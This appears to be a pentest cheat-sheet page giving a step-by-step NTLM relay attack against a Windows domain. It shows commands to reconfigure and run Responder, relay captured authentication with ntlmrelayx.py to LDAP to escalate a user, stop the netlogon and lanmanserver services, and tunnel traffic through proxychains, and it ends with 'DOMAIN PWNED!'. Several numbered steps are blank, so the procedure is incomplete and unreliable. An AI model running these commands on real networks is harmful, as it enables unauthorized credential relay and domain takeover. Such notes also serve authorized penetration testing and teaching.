githubEdit

WEAPONIZED NTLM RELAY

Tools: ntlmrelayx.py, responder

1) Turn off SMB in Responder configuration as ntlmrelayx.py will be handling SMB

sudo sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf

2) Start responder

 sudo python3 responder.py -I INTERFACE

3)

ntlmrelayx.py -t ldap://IP -smb2support --escalate-user USER

TIP: Works only when SMB signing is DISABLED (Use nmap for SMB privileges on the network)

4) Required packages: krb5-user, cifs-utils

5)

sc stop netlogon

6)

sc stop lanmanserver and sc config lanmanserver start= disabled

7)

8)

9)

10)

Wait 1-3 minutes for tunnel

11) Add "socks4 127.0.0.1 1080" to proxychains configuration file /etc/proxychains.conf

12)

13)

14)

Alternate tool: SMBExec.py

15)

16) DOMAIN PWNED!

Last updated